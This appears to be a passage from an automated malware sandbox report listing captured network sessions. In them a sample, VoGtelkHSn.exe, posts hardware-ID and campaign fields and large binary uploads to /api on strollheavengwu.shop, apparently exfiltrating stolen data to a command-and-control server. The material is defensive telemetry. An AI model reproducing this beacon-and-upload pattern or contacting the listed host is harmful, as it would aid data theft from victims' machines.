                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SzPqZ5eKLT4Xhu8ZN7nMOtqFZuDd2OIkgJdl2yEfYO%2FJAwLNvchzKvEb0zQxFHUtf08kt9J5q0yr5PLXJ0cZaFTjwtBU0xbNjgwTFc710HYvQY39HxzvDUJ4MuVLmQRLZ6pWjZGEVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87a39269580274ac-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-26 03:44:01 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 0d 0a
                                                    Data Ascii: 12ok 102.129.152.220
                                                    2024-04-26 03:44:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.549707172.67.163.2094435444C:\Users\user\Desktop\VoGtelkHSn.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-26 03:44:02 UTC286OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 15081
                                                    Host: strollheavengwu.shop
                                                    2024-04-26 03:44:02 UTC15081OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 31 46 37 43 38 46 42 32 42 32 34 34 39 45 35 35 38 44 35 38 41 39 39 32 39 42 38 37 41 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"011F7C8FB2B2449E558D58A9929B87A0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                    2024-04-26 03:44:03 UTC808INHTTP/1.1 200 OK
                                                    Date: Fri, 26 Apr 2024 03:44:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=t1lghn86kja0dm4ukh5nklg211; expires=Mon, 19-Aug-2024 21:30:41 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w3gu%2FZDh82aQg2zsFZoEF%2B3ukuPoDN6uyO8L8CPdoLJXBIOcsCttG3OHujZJgVLQ8FxYvsYdLqX5qc4OhbDv6nmeAxRltZDn1DFH8NINrZrgOYVQ%2FWzBoFCkisgTiL377MjvVZAHtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87a3926f9d540359-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-26 03:44:03 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 0d 0a
                                                    Data Ascii: 12ok 102.129.152.220
                                                    2024-04-26 03:44:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.549708172.67.163.2094435444C:\Users\user\Desktop\VoGtelkHSn.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-26 03:44:03 UTC286OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 20571
                                                    Host: strollheavengwu.shop
                                                    2024-04-26 03:44:03 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 31 46 37 43 38 46 42 32 42 32 34 34 39 45 35 35 38 44 35 38 41 39 39 32 39 42 38 37 41 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"011F7C8FB2B2449E558D58A9929B87A0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                    2024-04-26 03:44:03 UTC5240OUTData Raw: 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: >56vMMZh'F3Wun 4F([:7s~X`nO
                                                    2024-04-26 03:44:04 UTC804INHTTP/1.1 200 OK
                                                    Date: Fri, 26 Apr 2024 03:44:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=qhtom30u2bono7scbrq45rqu8j; expires=Mon, 19-Aug-2024 21:30:43 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5TSK3d9n8APRfDO7vwzMfJnHUXXTPp7gYREgA6oVEvLeyW80ChcOuAvbk66ad6La1qLJggatLepK4M46%2FFP6UgvSpmYxEg9UAzhMi2tQnKEeMvfk0STwCO30Kyp0kobos6an4JmUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87a392772bb84c04-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-26 03:44:04 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 0d 0a
                                                    Data Ascii: 12ok 102.129.152.220
                                                    2024-04-26 03:44:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.549709172.67.163.2094435444C:\Users\user\Desktop\VoGtelkHSn.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-26 03:44:04 UTC285OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 5448
                                                    Host: strollheavengwu.shop
                                                    2024-04-26 03:44:04 UTC5448OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 31 46 37 43 38 46 42 32 42 32 34 34 39 45 35 35 38 44 35 38 41 39 39 32 39 42 38 37 41 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"011F7C8FB2B2449E558D58A9929B87A0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                    2024-04-26 03:44:05 UTC808INHTTP/1.1 200 OK
                                                    Date: Fri, 26 Apr 2024 03:44:05 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=p9o1a3mfgn7nm36uat6524a81i; expires=Mon, 19-Aug-2024 21:30:44 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NsEzYk9sndonO4Wb%2BL1%2FEXtijtybxcHszSSfGq0VxznKVO2B1AyXjtRWAedgtCXFP8eJeBIMDRHVDatOh0v33tQB9hTgzbH6En5ceySz7mkSVmcpSEP3nQqCjMS%2BwoM6YNEf4UHNqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87a3927f0a16287a-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-26 03:44:05 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 0d 0a
                                                    Data Ascii: 12ok 102.129.152.220
                                                    2024-04-26 03:44:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.549710172.67.163.2094435444C:\Users\user\Desktop\VoGtelkHSn.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-26 03:44:05 UTC285OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 1385
                                                    Host: strollheavengwu.shop
                                                    2024-04-26 03:44:05 UTC1385OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 31 46 37 43 38 46 42 32 42 32 34 34 39 45 35 35 38 44 35 38 41 39 39 32 39 42 38 37 41 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"011F7C8FB2B2449E558D58A9929B87A0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                    2024-04-26 03:44:06 UTC814INHTTP/1.1 200 OK
                                                    Date: Fri, 26 Apr 2024 03:44:06 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=02b96qcm10fqta1cqt15up2pvt; expires=Mon, 19-Aug-2024 21:30:45 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DopSyKQk%2B4%2FzqFYeUTpFMbuBTk7Iud047dkPI7GZL4YucRFYwzm68nV6FXpLukpiUmLWZMNz%2FLgFavToo4AscXy9oU9bhiVV7X7Lk7cy%2BD4hm9FtQV9%2F%2BMD1jFKhCtf2cp7YpDepXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87a39285ae87d9f9-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-26 03:44:06 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 0d 0a
                                                    Data Ascii: 12ok 102.129.152.220
                                                    2024-04-26 03:44:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.549711172.67.163.2094435444C:\Users\user\Desktop\VoGtelkHSn.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-26 03:44:07 UTC287OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 577060
                                                    Host: strollheavengwu.shop
                                                    2024-04-26 03:44:07 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 31 46 37 43 38 46 42 32 42 32 34 34 39 45 35 35 38 44 35 38 41 39 39 32 39 42 38 37 41 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"011F7C8FB2B2449E558D58A9929B87A0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                    2024-04-26 03:44:07 UTC15331OUTData Raw: a2 56 37 7f 4f 45 df 14 02 0f 6b e8 17 41 7b 19 6f f6 ac 0e 30 18 65 ec 12 92 27 a7 ca ce d5 8a 30 28 10 e6 09 27 2f 11 7a 3b a0 39 21 ec 73 6a 15 0a ce 6c 80 97 c6 c4 0c 78 ab 61 ea 0f cc bd 16 ac 33 fc 31 d3 ba fd f0 94 40 67 69 2e 16 36 5a b2 cd 2b de 91 f2 72 1b 75 73 6a d6 bc 4a 61 a6 54 79 35 94 11 9f 33 cf 18 4e c2 1c eb f5 76 02 51 20 46 1a 9c 6d 6f cc c9 6b 45 77 3e 86 bb 84 7f ee 01 2f bc c5 e8 f3 6d 91 ac 83 4a 0b 5d d7 29 58 f8 b6 18 4e df 5d 8f 9b c4 cd 0c 5a 75 53 1a be a0 e2 29 2a 8f 5d bf ac a0 95 06 0b 92 bb 8f eb ea 67 3c a4 d6 4f a0 1b 32 33 a2 cd b1 31 53 e5 13 c8 cc 6c 54 a1 28 8f 8e d4 bb 3e fc 49 4f 6a 4f 62 fb a7 9f 5f 70 3f 4c 13 64 1b a0 93 45 c9 46 18 41 a8 0b 9b 20 71 d7 62 d3 09 03 53 a1 89 a5 cd 92 54 29 4a 7a 43 a4 a1 10 f1
                                                    Data Ascii: V7OEkA{o0e'0('/z;9!sjlxa31@gi.6Z+rusjJaTy53NvQ FmokEw>/mJ])XN]ZuS)*]g<O231SlT(>IOjOb_p?LdEFA qbST)JzC
                                                    2024-04-26 03:44:07 UTC15331OUTData Raw: 69 43 d9 ad 66 41 f8 e9 48 63 74 32 31 39 d7 42 63 73 37 a8 51 5f 7f fb be 3a 75 01 79 4d 1a 38 8f 7a 87 34 9a fa 0a 89 94 5a b1 52 61 62 d9 12 7c 4d 73 58 ee e2 a6 b6 9f 3a 65 9f 00 ab 08 1f 4b bf 43 4e 3a e1 26 24 2e d5 fd 99 29 ae 34 76 03 1b 4b e0 70 2a f1 4a 72 b8 ee 6d c4 41 7b 47 07 bd 9e 24 e4 57 b9 3e e8 fc 34 95 1c 71 f7 b8 7f f5 16 9d 27 cc 30 b3 aa bc a7 a5 fe be 3b 49 b1 61 d4 0d f1 55 ed 89 b7 fb aa ff e2 f4 7d e8 d5 64 d7 88 a4 84 cf 0f 53 3b 57 dd 1f 86 13 51 fd 8f 69 81 42 e7 de af 57 72 5d 7f 95 f3 4d 1f 3c 35 f3 4f c3 27 e7 1f fd 47 71 73 46 e3 6a e9 d0 55 e7 b1 7d 65 1b 3d cc 92 01 bf 80 8f c3 a1 6f b9 5d 79 9b 9f 4d 0d 22 6e 3a 97 86 5c 6e 06 ac 87 e5 91 a3 b9 15 ab a1 c1 c3 45 42 43 5f 76 65 28 d2 47 92 6c ab e9 11 6c 4b db d8 3c b6
                                                    Data Ascii: iCfAHct219Bcs7Q_:uyM8z4ZRab|MsX:eKCN:&$.)4vKp*JrmA{G$W>4q'0;IaU}dS;WQiBWr]M<5O'GqsFjU}e=o]yM"n:\nEBC_ve(GllK<
                                                    2024-04-26 03:44:07 UTC15331OUTData Raw: 54 b2 54 5e 50 78 cd 82 da 35 d0 73 95 a9 42 bd 67 3a b1 e5 6d e3 7d 56 f1 e3 93 33 83 30 ef 18 92 ba 49 5b e5 ad 12 aa fc f6 7e 7c 92 3b bb 72 88 eb c6 fa 41 76 ca 5f 91 07 bc 8a 75 b6 b3 0d 11 8f e9 56 e5 f6 9d a2 4c 62 db fb 21 91 d5 2e 9f 0c 8b 75 18 91 0a b1 2d d1 86 b9 b7 22 b4 a6 d9 81 bd 81 63 10 23 b2 00 4d f9 25 4b 93 dd 03 ca f6 40 86 dc 60 5c 33 43 07 0b f7 b1 69 0e a0 80 0e b2 ff 26 7c 22 71 4f d5 a8 18 28 42 a0 20 d0 23 70 be 90 1b fa 74 a1 7d 77 03 03 5e 21 84 17 17 68 24 90 3f 29 e7 99 62 33 ef eb 6b 71 e7 5d 3a 76 16 8e 1e 7f 5d a7 a6 ef 01 d3 bd 14 23 40 4e 47 c4 89 6e 98 82 ee b3 c2 ac 0f 12 2d 88 f2 2f c1 38 d8 c6 5a e9 d9 f0 30 af 63 cd a9 94 ee 3e 7d 54 77 35 51 11 35 9c 48 a4 e9 2a a2 d2 0a 8e a9 73 21 5f 53 e1 66 96 6d 90 27 28 3a
                                                    Data Ascii: TT^Px5sBg:m}V30I[~|;rAv_uVLb!.u-"c#M%K@`\3Ci&|"qO(B #pt}w^!h$?)b3kq]:v]#@NGn-/8Z0c>}Tw5Q5H*s!_Sfm'(:
                                                    2024-04-26 03:44:07 UTC15331OUTData Raw: 12 4d 13 e8 b8 b2 3e f3 9c e2 d6 d3 07 71 ad 36 75 01 3d d8 ac 03 d2 32 bb bb fd 5b 52 d4 b6 3e 2d 83 bf b8 5b 05 d7 8c 48 ed 7b 32 f3 8c 27 a0 87 5f c9 55 fe c4 a2 4d 81 a9 4b 45 2b 35 35 15 3e 52 ef f6 45 f1 da 5d 80 75 59 a5 f8 9f 0e bf 33 d4 6c d3 16 04 ed bc 46 a4 fa 7a 41 7f 88 33 4d 7c b6 f0 8b 3b 7b 92 d0 de 13 a4 c0 6c 78 02 c9 0e c2 77 31 33 23 8c c0 39 e6 57 4b e7 6c 3f ec 22 c0 6f 3d 15 94 5c e7 d7 81 ce 54 61 3b f5 3d b8 64 9a e7 2e c8 c1 45 6c 87 7f 86 0c 5c c9 a5 28 cf 4e 3c 94 d4 0c d7 50 bd e8 35 38 6b 55 e3 99 56 80 7b 54 33 33 e6 f7 dc 27 6a ac 09 cc 0d 26 90 47 c6 f2 9b 89 3b 83 27 8a 71 76 0e ef 97 b7 cc 11 d5 1b f7 33 9d 4f 5e 19 4b 5b b8 30 e0 d3 db e0 a8 67 83 9d bc 8e 49 41 53 5f 06 c7 6e 48 26 51 85 51 02 27 c6 21 52 30 71 1a 31
                                                    Data Ascii: M>q6u=2[R>-[H{2'_UMKE+55>RE]uY3lFzA3M|;{lxw13#9WKl?"o=\Ta;=d.El\(N<P58kUV{T33'j&G;'qv3O^K[0gIAS_nH&QQ'!R0q1
                                                    2024-04-26 03:44:07 UTC15331OUTData Raw: 31 04 ac a1 8d e0 cf 96 4e 41 1f c3 e1 33 0d 88 07 48 4c 50 c0 63 70 32 9f 35 ef fc 7d 60 92 cf 66 76 96 f4 f6 6b d4 48 5f 6e f8 9b f5 86 56 66 ca c7 bd f2 87 54 9e 7f 78 f7 17 92 ae dc 3f 89 bf 1b 06 05 fe 33 1e d9 86 05 36 82 3b e9 6b 09 b0 89 a1 85 e2 c2 74 7f 19 6a b1 f1 0f 28 77 30 a1 eb ea 03 10 30 bd c5 57 43 bb d8 1f e6 d3 79 90 24 a3 cc 9d e1 29 3d 8f 07 fe cb 8f c2 48 aa 3c 3c 6f f8 f1 76 dc 19 07 31 98 fe db bc 1e 58 10 c5 6b ba 35 05 f8 2b 7a de a0 db 6e 4e 16 b6 8a 96 01 68 fb 01 e2 9d d3 4c b0 f0 c5 5a 1b e3 41 0c 4b 04 63 47 74 33 1d 5e dc 9f b6 8c 6f 0d 33 30 33 72 28 9e fb 24 7b c3 5c c3 1e 16 e5 df c5 be 21 5d f0 94 02 b6 94 18 1d 3e 6d 05 c2 83 a1 f2 fb 89 69 c9 f0 08 f7 08 3d 16 a2 47 13 02 6a 42 b6 3f 0a 78 c8 be 0d 25 57 7c b9 a2 ba
                                                    Data Ascii: 1NA3HLPcp25}`fvkH_nVfTx?36;ktj(w00WCy$)=H<<ov1Xk5+znNhLZAKcGt3^o303r(${\!]>mi=GjB?x%W|
                                                    2024-04-26 03:44:07 UTC15331OUTData Raw: c2 95 39 9f 79 6c 07 29 bc cb b7 0a d5 e7 79 b8 8a b7 13 87 ab d3 92 57 12 43 cd 53 a3 6c 03 68 4b 2f ba 24 6d 08 8a 34 5b 73 e1 98 a7 61 8b 97 5c a1 9a a5 ec 76 27 94 5e ff bc 3b 9f 29 8e 6f 2e 68 9a 3f 37 bb dd d9 cc d0 61 a9 d9 0c 6f 88 de 9a 2a 37 6d 61 bf 7b a5 91 f0 4a be f2 d4 6f d6 93 96 cd 06 ff e1 83 a4 8e 5f 6e 5c 4e 73 29 21 29 73 dc 3a 19 fa c0 7c 05 fa 17 b7 c8 9b 3d 52 f8 54 af d4 c6 fc fe 51 80 db c5 18 91 19 21 a6 f1 6c d8 ce 5e 1e ab 19 78 57 fe c7 78 61 57 e7 a8 30 8a a4 0f fc e4 88 44 e9 8d c9 96 42 90 e0 61 8c db 78 c8 fe c8 ff 32 17 83 31 e1 2b e4 2c 16 0a 6f 7f dd d8 5c 59 2c ec 12 76 83 e8 c7 f5 bf c4 6b b2 26 b9 ae 06 8b e3 e3 e7 68 25 3c 49 c7 08 2a 02 54 dc ee cf f3 c4 2b bc 3d 45 ed 89 1a 42 1f c8 03 68 30 9d f6 f4 8e ed 86 b3
                                                    Data Ascii: 9yl)yWCSlhK/$m4[sa\v'^;)o.h?7ao*7ma{Jo_n\Ns)!)s:|=RTQ!l^xWxaW0DBax21+,o\Y,vk&h%<I*T+=EBh0
                                                    2024-04-26 03:44:07 UTC15331OUTData Raw: e1 54 dc b5 86 4b 69 19 fc c5 05 75 6a d7 5e 01 50 bf 5f 61 82 a4 33 59 cb 9b 4d 03 42 72 c2 60 46 4d 65 6a ef 4e be 52 93 69 74 fa 5b ec b2 4a e4 e8 40 a8 31 ab b8 22 08 60 b1 67 5e 0b 4d 9a 19 89 2e 7b eb 8e 55 ae e7 21 fa 5f 56 f6 e5 78 db 70 ab 7f 3e d3 e8 6e de c4 fc 6f 89 85 70 54 78 ca 6b 40 0f 3e 1c db 16 f7 9d f3 cc 62 af 51 f8 cd ae f7 1c 92 59 19 9b 93 f8 2f e1 d0 8e dd cc 99 67 33 5e 37 20 4a d9 8e ed 32 fd 29 55 07 9f 84 92 8d de 01 8a 93 bd 1e 1a 48 23 70 d8 93 33 19 21 42 57 b5 db 87 ae f9 df c2 be 3f ef d9 49 88 8f 20 30 f4 ea 90 e4 cb 3d 42 4e 22 7a e5 4d e8 fe 40 21 c6 5e b7 e7 16 4b df 6e 4f 5c 2d b8 9d de de 72 dc 2b 58 21 d5 e6 8c ad 34 76 5e 1a f4 ea 46 1b 5c 3c 8b 24 df aa 45 b4 6e 03 21 c5 7f 00 a5 6c 13 a8 ae 07 41 e6 94 fe 14 05
                                                    Data Ascii: TKiuj^P_a3YMBr`FMejNRit[J@1"`g^M.{U!_Vxp>nopTxk@>bQY/g3^7 J2)UH#p3!BW?I 0=BN"zM@!^KnO\-r+X!4v^F\<$En!lA
